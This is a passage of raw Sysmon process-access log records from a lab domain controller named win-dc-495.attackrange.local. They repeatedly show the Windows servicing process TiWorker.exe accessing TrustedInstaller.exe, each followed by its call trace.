4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.570{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.570{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.570{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.570{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.555{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.555{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.555{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.555{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.539{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.539{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.539{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.539{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.539{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.539{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.523{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.523{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.523{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.523{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.